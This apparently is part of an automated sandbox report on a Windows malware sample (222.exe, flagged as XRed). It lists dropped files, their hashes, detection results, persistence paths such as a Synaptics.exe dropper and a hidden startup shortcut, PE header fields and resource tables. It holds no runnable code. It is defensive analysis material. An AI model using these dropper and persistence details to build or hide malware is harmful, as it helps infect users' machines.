                                                                                                                                      SHA-512:7BACDF0D8FD8C7082EBEA1A6FF71A8AA42446C6E27F512B2FA913B07E9E84B9204EF6AF78BED5CC4796092993B2D6DB0F47E00337CFEC4F5C24CBD27BB7DFACE
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.280360244913426
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0iXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+T+pAZewRDK4mW
                                                                                                                                      MD5:BB2A8AB72D7DE96AB8A8FFD959AE1CCD
                                                                                                                                      SHA1:422140E520EDF79530A961EF943FF2BF6217B867
                                                                                                                                      SHA-256:EF6853CA10E66E83B108D611353C34AAEB540BF6C68AAA79DA8847DA83D89F3A
                                                                                                                                      SHA-512:66F3B249B26958D708B4B0951114BCDA2BD558D1C3354425B890B1ACB70A5D28E86C1C96CDBD29F61724E059CD15ED06C1D04146B5C4BCC3492C29CFE6D579E1
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.261501071452724
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0abSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X+pAZewRDK4mW
                                                                                                                                      MD5:CE91FE697EB65341F57864F9D669E6C8
                                                                                                                                      SHA1:7D56A7B5BD2AD13F1C467560E1B6D1B1036931DE
                                                                                                                                      SHA-256:AE4303F796A66DC547EB19829D109AD7BC1F1AA824DF431205E96784D2C49B3D
                                                                                                                                      SHA-512:AFBFC06AD4B3A8A63F374517DC91E2BE337D22D62AB0272C9A2127589344800B831FAE32E2225D078DAA18D98228A5F5F29E12330C8CB96287B6338E86FCC4DA
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.2560418384543555
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+G+pAZewRDK4mW
                                                                                                                                      MD5:E82190DF3B11D22E7C09F458E32F4178
                                                                                                                                      SHA1:F6F68AAFAACAB5B4195F970BA2206A0EA6A81B42
                                                                                                                                      SHA-256:11932F1A7B433CEE9FE6766FA5C74910D696D9F10B677E3B2CB03E5FE14BAC04
                                                                                                                                      SHA-512:AE517E4C07AE34139985F6D79FDFD682CDE6030BEC071E7DF4F4EF071CE8012EF5B7855C2FAF9B7A17F53743C54CF79C3EBE8C0B7D093AB7F3F49CAC4E86196E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.2585054178951465
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0QSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+H+pAZewRDK4mW
                                                                                                                                      MD5:CA352B7DDE3158C740070F1A7F0B1BEC
                                                                                                                                      SHA1:D22CC3570246CA549AB4E40DDF741D44962B115B
                                                                                                                                      SHA-256:F38012119C7D810625CD4FF5934A428FE8CA85FFFCB7918E76E9DB561116EB11
                                                                                                                                      SHA-512:DBD9C55C2D7A67EB976EA6CC46A1247CF353AC44AC24E7CEC54A9B2251B14D5A426C9B2E08D571DCABC12C2793E76A535ED23CB870AB66DA37B120533A8E0ED2
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.262114745598291
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0s9ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+u+pAZewRDK4mW
                                                                                                                                      MD5:152FBD34E335DFD605119369004BCEA4
                                                                                                                                      SHA1:C4AD71E2C80B0994799527EF894E316E6986F13D
                                                                                                                                      SHA-256:17E0AADC806B03B38ADAD0D201FB005646C6C6B65AB28B3AC70479B352C635E8
                                                                                                                                      SHA-512:FEF0DE0D19AF6F68A70F471C9F589BD49D6ED80F94815102899B3EB17520AC3A45931B9BA2491CDD9F839ADD7CA5EC138E96FC88BC7A09D2E365CB1D72999DA2
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.264359374871053
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+B+pAZewRDK4mW
                                                                                                                                      MD5:78EF7A6792C72516F8649FC65435AC30
                                                                                                                                      SHA1:886C276FE260AD39E7E176FB76F65F285A5A8C6F
                                                                                                                                      SHA-256:18D4703FA3DE1836B6A15BDF4663C3992BDAA7162D2FC0D7B9F7EB10A9353C1E
                                                                                                                                      SHA-512:22743ADD3266B382C2904401510BA13A7AA99CE8D4ACFF9612C228FE8D431984CE5389E9A7B3BE63C645CEB30A37A537C5AC241EE5AAF66E237243C518A1D66A
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):165
                                                                                                                                      Entropy (8bit):1.5231029153786204
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:sYp5lFltt:sYp5Nv
                                                                                                                                      MD5:B77267835A6BEAC785C351BDE8E1A61C
                                                                                                                                      SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                                                                                                                                      SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                                                                                                                                      SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):32768
                                                                                                                                      Entropy (8bit):3.746897789531007
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                      MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                      SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                      SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                      SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\Desktop\._cache_222.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:22:56 2024, mtime=Mon Dec 30 09:22:56 2024, atime=Mon Dec 30 09:22:56 2024, length=952320, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1808
                                                                                                                                      Entropy (8bit):3.396160731956181
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:8qwfOL48pZLeVZtbNqLtE0QA0OjE2+s9T4IlQpL9m:8qwc97MJYLKkvr9MIlQ/
                                                                                                                                      MD5:672F4764AF02B3461FAA426D96AD51BB
                                                                                                                                      SHA1:C1EFEAD747164EF41A44F85A149953D5254001F5
                                                                                                                                      SHA-256:D10794ADDA780AD7A682955C5650E16F8B64E309D60D93CFFE8D37691F1BAF8D
                                                                                                                                      SHA-512:7F12FB55F134D87280E81B41814C3932291D18A1C65DC2E2D8E3EEAA0BB800E258FBE1CEB6B0AB55C0FDA5FC9E744CDD1DAB2C5B33658AB5083461D0D50AF3DA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L..................F.@.. .......Z...A..Z...A..Z............................:..DG..Yr?.D..U..k0.&...&...... M......u..Z..4"..Z......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y.R....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.R..Roaming.@......DWSl.Y.R....C......................a..R.o.a.m.i.n.g.....V.1......Y.R..Windata.@......Y.R.Y.R....s.....................hn..W.i.n.d.a.t.a.....`.2......Y.R .EWZJGF.exe..F......Y.R.Y.R..........................$...E.W.Z.J.G.F...e.x.e.......a...............-.......`...........;d.......C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.E.W.Z.J.G.F...e.x.e.*.".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll............................................................................................................
                                                                                                                                      Process:C:\Users\user\Desktop\._cache_222.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):952320
                                                                                                                                      Entropy (8bit):7.853882881449956
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:ZhloDX0XOf4LvPAXY3+3NRMaqIL90KNUFmX1tqqNZlz:ZhloJfCAh9RMUBrNUFqtBZl
                                                                                                                                      MD5:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      SHA1:A0B1EC84B0A2DB8F801981E247578217B71B38DA
                                                                                                                                      SHA-256:1FE023F69F42FCD4BE4BAA180BBFF00B7FFE51C553211DD0DF45FB7FF71148B8
                                                                                                                                      SHA-512:111C1915D81141398B6BB7A0AA0E98896FB05D5548ACE8FD1E0E23343EAE60EA1E3D6617D3F5F883B96C8E05F5F868A280683341810896C00FA6EF1F68338992
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....Hng.........."......P...@...`.......p........@........................... ...........@...@.......@.....................\...$.......\;..............................................................H...........................................UPX0.....`..............................UPX1.....P...p...D..................@....rsrc....@.......@...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                                      Process:C:\Users\user\Desktop\222.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):952320
                                                                                                                                      Entropy (8bit):7.853882881449956
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:ZhloDX0XOf4LvPAXY3+3NRMaqIL90KNUFmX1tqqNZlz:ZhloJfCAh9RMUBrNUFqtBZl
                                                                                                                                      MD5:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      SHA1:A0B1EC84B0A2DB8F801981E247578217B71B38DA
                                                                                                                                      SHA-256:1FE023F69F42FCD4BE4BAA180BBFF00B7FFE51C553211DD0DF45FB7FF71148B8
                                                                                                                                      SHA-512:111C1915D81141398B6BB7A0AA0E98896FB05D5548ACE8FD1E0E23343EAE60EA1E3D6617D3F5F883B96C8E05F5F868A280683341810896C00FA6EF1F68338992
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....Hng.........."......P...@...`.......p........@........................... ...........@...@.......@.....................\...$.......\;..............................................................H...........................................UPX0.....`..............................UPX1.....P...p...D..................@....rsrc....@.......@...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):18387
                                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):165
                                                                                                                                      Entropy (8bit):1.5231029153786204
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:sYp5lFltt:sYp5Nv
                                                                                                                                      MD5:B77267835A6BEAC785C351BDE8E1A61C
                                                                                                                                      SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                                                                                                                                      SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                                                                                                                                      SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):771584
                                                                                                                                      Entropy (8bit):6.638013190381294
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                      MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                      SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                      SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                      SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1835008
                                                                                                                                      Entropy (8bit):4.4217530311243225
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:RSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNT0uhiTw:ovloTMW+EZMM6DFyp03w
                                                                                                                                      MD5:2BE175707625ABA5750740914B18349F
                                                                                                                                      SHA1:62109D36A2E081BF43CD760C2DE97066249B1B3E
                                                                                                                                      SHA-256:C9744729FBDB0D0EDA5B128FE95680E3BB827C9EF7435A4EAF84ADDF4EA081DE
                                                                                                                                      SHA-512:072461C45906BCDF5D08EE3214B10E47BE134E6F2FE95324607A8B7119C654596B784DBB3E1870A5D4EE8C132F4DD7645E428AA321C613A9E69ED5152A8CF333
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..!.Z................................................................................................................................................................................................................................................................................................................................................6.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.463863136848696
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 93.09%
                                                                                                                                      • Win32 Executable Borland Delphi 7 (665061/41) 6.19%
                                                                                                                                      • UPX compressed Win32 Executable (30571/9) 0.28%
                                                                                                                                      • Win32 EXE Yoda's Crypter (26571/9) 0.25%
                                                                                                                                      • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                                      File name:222.exe
                                                                                                                                      File size:1'723'904 bytes
                                                                                                                                      MD5:71386f37f17778126296ca734975db6d
                                                                                                                                      SHA1:353818dcd74d06565fc0e8ac4416e594d29ecd0b
                                                                                                                                      SHA256:c1317da0fd0dc3d73b38634ea586016f6f651f52acc576fbae8b82721c83e9ae
                                                                                                                                      SHA512:e5e0d87f91611bccfea16222c9afb7ac7b949f1762244ced01f9d8a78e2c992cfe8c1faaf1391f4cf107604a0e9f7a64fa4adda1c339d8dc85b27e7be610b83c
                                                                                                                                      SSDEEP:49152:gnsHyjtk2MYC5GD8hloJfCAh9RMUBrNUFqtBZlO:gnsmtk2a1hlPERBsiTs
                                                                                                                                      TLSH:BF85C0B2B3818436D433563C8C7B93A75427BA5D2D38690D3BE57F4E6E3A34228261D7
                                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                      Icon Hash:2eec8e8cb683b9b1
                                                                                                                                      Entrypoint:0x49ab80
                                                                                                                                      Entrypoint Section:CODE
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                      DLL Characteristics:
                                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:4
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:4
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:4
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                                                                      Instruction
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      add esp, FFFFFFF0h
                                                                                                                                      mov eax, 0049A778h
                                                                                                                                      call 00007F576085A79Dh
                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                      call 00007F57608AE0E5h
                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                      mov edx, 0049ABE0h
                                                                                                                                      call 00007F57608ADCE4h
                                                                                                                                      mov ecx, dword ptr [0049DBDCh]
                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                      mov edx, dword ptr [00496590h]
                                                                                                                                      call 00007F57608AE0D4h
                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                      call 00007F57608AE148h
                                                                                                                                      call 00007F576085827Bh
                                                                                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2a42 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0xfa530 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0xa980 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0xa4018 | 0x21 | .rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xa4000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x99bec | 0x99c00 | 33fbe30e8a64654287edd1bf05ae7c8c | False | 0.5141641260162602 | data | 6.572957870355296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x9b000 | 0x2e54 | 0x3000 | 1f5e19e7d20c1d128443d738ac7bc610 | False | 0.453125 | data | 4.854620797809023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x9e000 | 0x11e5 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa0000 | 0x2a42 | 0x2c00 | 21ff53180b390dc06e3a1adf0e57a073 | False | 0.3537819602272727 | data | 4.919333216027082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xa3000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xa4000 | 0x39 | 0x200 | a92cf494c617731a527994013429ad97 | False | 0.119140625 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J" | 0.7846201577093705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0xa5000 | 0xa980 | 0xaa00 | dcd1b1c3f3d28d444920211170d1e8e6 | False | 0.5899816176470588 | data | 6.674124985579511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0xb0000 | 0xfa530 | 0xfa600 | 30d46fc5e50491835f364d71df06ae89 | False | 0.8753832142411383 | data | 7.769726099444571 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xb0dc8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" |  |  | 0.38636363636363635
RT_CURSOR | 0xb0efc | 0x134 | data |  |  | 0.4642857142857143
RT_CURSOR | 0xb1030 | 0x134 | data |  |  | 0.4805194805194805
RT_CURSOR | 0xb1164 | 0x134 | data |  |  | 0.38311688311688313
RT_CURSOR | 0xb1298 | 0x134 | data |  |  | 0.36038961038961037
RT_CURSOR | 0xb13cc | 0x134 | data |  |  | 0.4090909090909091
RT_CURSOR | 0xb1500 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" |  |  | 0.4967532467532468
RT_BITMAP | 0xb1634 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.43103448275862066
RT_BITMAP | 0xb1804 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 |  |  | 0.46487603305785125
RT_BITMAP | 0xb19e8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.43103448275862066
RT_BITMAP | 0xb1bb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.39870689655172414
RT_BITMAP | 0xb1d88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.4245689655172414
RT_BITMAP | 0xb1f58 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.5021551724137931
RT_BITMAP | 0xb2128 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.5064655172413793
RT_BITMAP | 0xb22f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.39655172413793105
RT_BITMAP | 0xb24c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.5344827586206896
RT_BITMAP | 0xb2698 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.39655172413793105
RT_BITMAP | 0xb2868 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 |  |  | 0.4870689655172414
RT_ICON | 0xb2950 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 |  |  | 0.36350844277673544
RT_ICON | 0xb39f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 8192 | Turkish | Turkey | 0.2101313320825516
RT_DIALOG | 0xb4aa0 | 0x52 | data |  |  | 0.7682926829268293
RT_STRING | 0xb4af4 | 0x358 | data |  |  | 0.3796728971962617
RT_STRING | 0xb4e4c | 0x428 | data |  |  | 0.37406015037593987
RT_STRING | 0xb5274 | 0x3a4 | data |  |  | 0.40879828326180256
RT_STRING | 0xb5618 | 0x3bc | data |  |  | 0.33472803347280333
